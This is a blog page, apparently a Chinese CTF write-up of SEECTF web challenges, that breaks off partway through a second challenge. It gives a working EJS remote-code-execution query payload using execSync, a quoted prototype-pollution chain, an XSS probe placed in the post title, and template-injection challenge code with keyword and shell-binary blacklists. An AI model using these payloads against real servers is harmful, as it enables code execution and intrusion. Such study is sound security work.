<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="SEECTF web 解题记录">
<meta property="og:type" content="article">
<meta property="og:title" content="SEECTF writeups - web challs&quot;&lt;img src&#x3D;1 onerror&#x3D;alert(1)&gt;">
<meta property="og:url" content="http://example.com/2023/06/12/SEECTFwriteups/index.html">
<meta property="og:site_name" content="L1aoのblog">
<meta property="og:description" content="SEECTF web 解题记录">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185226271.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185648634.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185715014.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185824441.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612193421396.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612193552527.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612193837894.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612193926084.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612194802760.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612195016960.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612205357282.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612205043988.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/T@$IP18LFCP7Z~T59RIQPUW.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612205228720.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612200724129.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612201823714.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612201621811.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612201800630.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612202614285.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612202817364.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612202944776.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612203042917.png">
<meta property="article:published_time" content="2023-06-11T16:00:00.000Z">
<meta property="article:modified_time" content="2023-10-16T12:32:39.094Z">
<meta property="article:author" content="L1ao">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185226271.png">

<link rel="canonical" href="http://example.com/2023/06/12/SEECTFwriteups/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>SEECTF writeups - web challs"<img src=1 onerror=alert(1)> | L1aoのblog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">L1aoのblog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">无聊的世界因为我又添了一顿累赘</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/06/12/SEECTFwriteups/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxian2.jpg">
      <meta itemprop="name" content="L1ao">
      <meta itemprop="description" content="CTFer">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="L1aoのblog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SEECTF writeups - web challs"<img src=1 onerror=alert(1)>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2023-06-12 00:00:00" itemprop="dateCreated datePublished" datetime="2023-06-12T00:00:00+08:00">2023-06-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-10-16 20:32:39" itemprop="dateModified" datetime="2023-10-16T20:32:39+08:00">2023-10-16</time>
              </span>

          
            <div class="post-description">SEECTF web 解题记录<img src=1 onerror=alert(1)></div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="SEECTF-writeups-web-challs"><a href="#SEECTF-writeups-web-challs" class="headerlink" title="SEECTF writeups - web challs"></a>SEECTF writeups - web challs</h1><p>关键字：ejs，php.ini，ini_set，sqlite3，ssti</p>
<p>ctftime：<a target="_blank" rel="noopener" href="https://ctftime.org/event/1828">https://ctftime.org/event/1828</a></p>
<h2 id="Express-JavaScript-Security"><a href="#Express-JavaScript-Security" class="headerlink" title="Express JavaScript Security"></a>Express JavaScript Security</h2><p>核心代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">app.get(<span class="string">&#x27;/greet&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">console</span>.log(req.query);</span><br><span class="line">    <span class="keyword">const</span> data = <span class="built_in">JSON</span>.stringify(req.query);</span><br><span class="line">    <span class="built_in">console</span>.log(data);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (BLACKLIST.find(<span class="function">(<span class="params">item</span>) =&gt;</span> data.includes(item))) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.status(<span class="number">400</span>).send(<span class="string">&#x27;Can you not?&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> res.render(<span class="string">&#x27;greet&#x27;</span>, &#123;</span><br><span class="line">        ...JSON.parse(data),</span><br><span class="line">        cache: <span class="literal">false</span></span><br><span class="line">    &#125;);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>题目构造很简单，使用的是最新版的ejs和express</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&quot;dependencies&quot;: &#123;</span><br><span class="line">  &quot;express&quot;: &quot;^4.18.2&quot;,</span><br><span class="line">  &quot;ejs&quot;: &quot;^3.1.9&quot;</span><br><span class="line">&#125;,</span><br></pre></td></tr></table></figure>
<p>我们可以给render塞任意参数，需要达到一个RCE的目的</p>
<p>debug运行一下程序，给render下一个断点，跟进一下代码</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185226271.png" alt="image-20230612185226271"></p>
<p>调用栈</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">render (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\application.js:571)</span><br><span class="line">render (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\response.js:1039)</span><br><span class="line">&lt;anonymous&gt; (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\main.js:29)</span><br><span class="line">.............</span><br></pre></td></tr></table></figure>
<p>看到一个merge函数，猜测存在原型链污染漏洞</p>
<p>这里的merge是<code>var merge = require(&#39;utils-merge&#39;);</code>导入的</p>
<p>经过测试发现并不能污染到原型</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185648634.png" alt="image-20230612185648634"></p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185715014.png" alt="image-20230612185715014"></p>
<p>查看<code>utils-merge</code>中的函数，是直接进行拷贝，无法直接对原型进行修改</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612185824441.png" alt="image-20230612185824441"></p>
<p>原型链污染这条路断了，我们继续看render的参数怎么工作</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612193421396.png" alt="image-20230612193421396"></p>
<p>这里将传入的参数赋值给<code>data</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">exports.renderFile (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\ejs\lib\ejs.js:475)</span><br><span class="line">render (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\view.js:135)</span><br><span class="line">tryRender (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\application.js:657)</span><br><span class="line">render (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\application.js:609)</span><br><span class="line">render (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\response.js:1039)</span><br><span class="line">&lt;anonymous&gt; (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\main.js:29)</span><br><span class="line">.............</span><br></pre></td></tr></table></figure>
<p>这里如果 <code>data.settings[&#39;view options&#39;]</code> 存在值，则会将 <code>data.settings[&#39;view options&#39;]</code> 的值拷贝给<code>opts</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612193552527.png" alt="image-20230612193552527"></p>
<p>继续跟进代码，<code>opts</code>的值会传递给<code>options</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612193837894.png" alt="image-20230612193837894"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">Template (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\ejs\lib\ejs.js:510)</span><br><span class="line">compile (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\ejs\lib\ejs.js:397)</span><br><span class="line">handleCache (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\ejs\lib\ejs.js:235)</span><br><span class="line">tryHandleCache (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\ejs\lib\ejs.js:274)</span><br><span class="line">exports.renderFile (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\ejs\lib\ejs.js:491)</span><br><span class="line">render (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\view.js:135)</span><br><span class="line">tryRender (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\application.js:657)</span><br><span class="line">render (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\application.js:609)</span><br><span class="line">render (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\node_modules\express\lib\response.js:1039)</span><br><span class="line">&lt;anonymous&gt; (\mnt\d\Desktop\security\ctf2023games\SEETF2023\dist_express-javascript-security_31d3740ae934682d8c36d3a3182c29981e0c9909\main.js:29)</span><br><span class="line">.............</span><br></pre></td></tr></table></figure>
<p>然后继续传递到compile</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612193926084.png" alt="image-20230612193926084"></p>
<p>这里就是比较熟悉的原型链污染触发的地方，所有我们可以通过设置<code>data.settings[&#39;view options&#39;]</code>的值来控制<code>opts</code>，进而控制<code>options</code>，达到和原型链污染差不多的效果</p>
<p>存在黑名单</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> BLACKLIST = [</span><br><span class="line">    <span class="string">&quot;outputFunctionName&quot;</span>,</span><br><span class="line">    <span class="string">&quot;escapeFunction&quot;</span>,</span><br><span class="line">    <span class="string">&quot;localsName&quot;</span>,</span><br><span class="line">    <span class="string">&quot;destructuredLocals&quot;</span></span><br><span class="line">]</span><br></pre></td></tr></table></figure>
<p>参考：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/236354#h2-2">https://www.anquanke.com/post/id/236354#h2-2</a>    的链子</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">&quot;__proto__&quot;</span>:&#123;<span class="attr">&quot;__proto__&quot;</span>:&#123;<span class="attr">&quot;client&quot;</span>:<span class="literal">true</span>,<span class="attr">&quot;escapeFunction&quot;</span>:<span class="string">&quot;1; return global.process.mainModule.constructor._load(&#x27;child_process&#x27;).execSync(&#x27;dir&#x27;);&quot;</span>,<span class="attr">&quot;compileDebug&quot;</span>:<span class="literal">true</span>,<span class="attr">&quot;debug&quot;</span>:<span class="literal">true</span>&#125;&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>观察<code>Template</code>，我们发现通过设置<code>opts.escape</code>的值来设置<code>options.escapeFunction</code>，来绕过黑名单</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">opts = opts || utils.createNullProtoObjWherePossible();</span><br><span class="line"><span class="keyword">var</span> options = utils.createNullProtoObjWherePossible();</span><br><span class="line"><span class="built_in">this</span>.templateText = text;</span><br><span class="line"><span class="comment">/** <span class="doctag">@type <span class="type">&#123;string | null&#125;</span> </span>*/</span></span><br><span class="line"><span class="built_in">this</span>.mode = <span class="literal">null</span>;</span><br><span class="line"><span class="built_in">this</span>.truncate = <span class="literal">false</span>;</span><br><span class="line"><span class="built_in">this</span>.currentLine = <span class="number">1</span>;</span><br><span class="line"><span class="built_in">this</span>.source = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">options.client = opts.client || <span class="literal">false</span>;</span><br><span class="line">options.escapeFunction = opts.escape || opts.escapeFunction || utils.escapeXML;</span><br><span class="line">options.compileDebug = opts.compileDebug !== <span class="literal">false</span>;</span><br><span class="line">options.debug = !!opts.debug;</span><br><span class="line">options.filename = opts.filename;</span><br><span class="line">options.openDelimiter = opts.openDelimiter || <span class="built_in">exports</span>.openDelimiter || _DEFAULT_OPEN_DELIMITER;</span><br><span class="line">options.closeDelimiter = opts.closeDelimiter || <span class="built_in">exports</span>.closeDelimiter || _DEFAULT_CLOSE_DELIMITER;</span><br><span class="line">options.delimiter = opts.delimiter || <span class="built_in">exports</span>.delimiter || _DEFAULT_DELIMITER;</span><br><span class="line">options.strict = opts.strict || <span class="literal">false</span>;</span><br><span class="line">options.context = opts.context;</span><br><span class="line">options.cache = opts.cache || <span class="literal">false</span>;</span><br><span class="line">options.rmWhitespace = opts.rmWhitespace;</span><br><span class="line">options.root = opts.root;</span><br><span class="line">options.includer = opts.includer;</span><br><span class="line">options.outputFunctionName = opts.outputFunctionName;</span><br><span class="line">options.localsName = opts.localsName || <span class="built_in">exports</span>.localsName || _DEFAULT_LOCALS_NAME;</span><br><span class="line">options.views = opts.views;</span><br><span class="line">options.async = opts.async;</span><br><span class="line">options.destructuredLocals = opts.destructuredLocals;</span><br><span class="line">options.legacyInclude = <span class="keyword">typeof</span> opts.legacyInclude != <span class="string">&#x27;undefined&#x27;</span> ? !!opts.legacyInclude : <span class="literal">true</span>;</span><br></pre></td></tr></table></figure>
<p>最终payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;greet?settings[view options][escape]&#x3D;1; return global.process.mainModule.constructor._load(&#39;child_process&#39;).execSync(&#39;&#x2F;readflag&#39;);&amp;settings[view options][client]&#x3D;true&amp;settings[view options][compileDebug]&#x3D;true&amp;settings[view options][debug]&#x3D;true</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612194802760.png" alt="image-20230612194802760"></p>
<p>拼接代码，任意代码执行</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612195016960.png" alt="image-20230612195016960"></p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612205357282.png" alt="image-20230612205357282"></p>
<h2 id="file-uploader-1"><a href="#file-uploader-1" class="headerlink" title="file uploader 1"></a>file uploader 1</h2><p>存在漏洞点</p>
<p>如果<code>fileext</code>不在白名单中，会将文件名拼接到<code>template</code>中然后渲染返回</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/upload&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upload_file</span>():</span></span><br><span class="line">    <span class="keyword">if</span> request.method != <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;profile&#x27;</span>))</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># check if the post request has the file part</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;file&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> request.files:</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;profile&#x27;</span>))</span><br><span class="line">    file = request.files[<span class="string">&#x27;file&#x27;</span>]</span><br><span class="line"></span><br><span class="line">    <span class="comment"># If the user does not select a file, the browser submits an empty file without a filename.</span></span><br><span class="line">    <span class="keyword">if</span> file.filename == <span class="string">&#x27;&#x27;</span>:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;profile&#x27;</span>))</span><br><span class="line">    </span><br><span class="line">    fileext = get_fileext(file.filename)</span><br><span class="line"></span><br><span class="line">    file.seek(<span class="number">0</span>, <span class="number">2</span>) <span class="comment"># seeks the end of the file</span></span><br><span class="line">    filesize = file.tell() <span class="comment"># tell at which byte we are</span></span><br><span class="line">    file.seek(<span class="number">0</span>, <span class="number">0</span>) <span class="comment"># go back to the beginning of the file</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> fileext <span class="keyword">and</span> filesize &lt; <span class="number">10</span>*<span class="number">1024</span>*<span class="number">1024</span>:</span><br><span class="line">        <span class="keyword">if</span> session[<span class="string">&#x27;ext&#x27;</span>] <span class="keyword">and</span> os.path.exists(os.path.join(UPLOAD_FOLDER, session[<span class="string">&#x27;uuid&#x27;</span>]+<span class="string">&quot;.&quot;</span>+session[<span class="string">&#x27;ext&#x27;</span>])):</span><br><span class="line">            os.remove(os.path.join(UPLOAD_FOLDER, session[<span class="string">&#x27;uuid&#x27;</span>]+<span class="string">&quot;.&quot;</span>+session[<span class="string">&#x27;ext&#x27;</span>]))</span><br><span class="line">        session[<span class="string">&#x27;ext&#x27;</span>] = fileext</span><br><span class="line">        filename = session[<span class="string">&#x27;uuid&#x27;</span>]+<span class="string">&quot;.&quot;</span>+session[<span class="string">&#x27;ext&#x27;</span>]</span><br><span class="line">        file.save(os.path.join(UPLOAD_FOLDER, filename))</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;profile&#x27;</span>))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        template = <span class="string">f&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">            <span class="subst">&#123;file.filename&#125;</span> is not valid because it is too big or has the wrong extension</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line">        l1 = [<span class="string">&#x27;+&#x27;</span>, <span class="string">&#x27;&#123;&#123;&#x27;</span>, <span class="string">&#x27;&#125;&#125;&#x27;</span>, <span class="string">&#x27;[2]&#x27;</span>, <span class="string">&#x27;flask&#x27;</span>, <span class="string">&#x27;os&#x27;</span>,<span class="string">&#x27;config&#x27;</span>, <span class="string">&#x27;subprocess&#x27;</span>, <span class="string">&#x27;debug&#x27;</span>, <span class="string">&#x27;read&#x27;</span>, <span class="string">&#x27;write&#x27;</span>, <span class="string">&#x27;exec&#x27;</span>, <span class="string">&#x27;popen&#x27;</span>, <span class="string">&#x27;import&#x27;</span>, <span class="string">&#x27;request&#x27;</span>, <span class="string">&#x27;|&#x27;</span>, <span class="string">&#x27;join&#x27;</span>, <span class="string">&#x27;attr&#x27;</span>, <span class="string">&#x27;globals&#x27;</span>, <span class="string">&#x27;\\&#x27;</span>] </span><br><span class="line"></span><br><span class="line">        l2 = [<span class="string">&#x27;aa-exec&#x27;</span>, <span class="string">&#x27;agetty&#x27;</span>, <span class="string">&#x27;alpine&#x27;</span>, <span class="string">&#x27;ansible-playbook&#x27;</span>, <span class="string">&#x27;ansible-test&#x27;</span>, <span class="string">&#x27;aoss&#x27;</span>, <span class="string">&#x27;apt&#x27;</span>, <span class="string">&#x27;apt-get&#x27;</span>, <span class="string">&#x27;aria2c&#x27;</span>, <span class="string">&#x27;arj&#x27;</span>, <span class="string">&#x27;arp&#x27;</span>, <span class="string">&#x27;ascii-xfr&#x27;</span>, <span class="string">&#x27;ascii85&#x27;</span>, <span class="string">&#x27;ash&#x27;</span>, <span class="string">&#x27;aspell&#x27;</span>, <span class="string">&#x27;atobm&#x27;</span>, <span class="string">&#x27;awk&#x27;</span>, <span class="string">&#x27;aws&#x27;</span>, <span class="string">&#x27;base&#x27;</span>, <span class="string">&#x27;base32&#x27;</span>, <span class="string">&#x27;base58&#x27;</span>, <span class="string">&#x27;base64&#x27;</span>, <span class="string">&#x27;basenc&#x27;</span>, <span class="string">&#x27;basez&#x27;</span>, <span class="string">&#x27;bash&#x27;</span>, <span class="string">&#x27;batcat&#x27;</span>, <span class="string">&#x27;bconsole&#x27;</span>, <span class="string">&#x27;bpftrace&#x27;</span>, <span class="string">&#x27;bridge&#x27;</span>, <span class="string">&#x27;bundle&#x27;</span>, <span class="string">&#x27;bundler&#x27;</span>, <span class="string">&#x27;busctl&#x27;</span>, <span class="string">&#x27;busybox&#x27;</span>, <span class="string">&#x27;byebug&#x27;</span>, <span class="string">&#x27;bzip2&#x27;</span>, <span class="string">&#x27;c89&#x27;</span>, <span class="string">&#x27;c99&#x27;</span>, <span class="string">&#x27;cabal&#x27;</span>, <span class="string">&#x27;cancel&#x27;</span>, <span 